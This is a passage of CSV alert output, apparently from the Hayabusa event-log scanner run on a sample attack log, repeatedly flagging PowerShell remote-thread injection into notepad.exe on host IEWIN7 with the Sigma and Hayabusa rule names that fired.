Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,high,Exec,Accessing 
WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
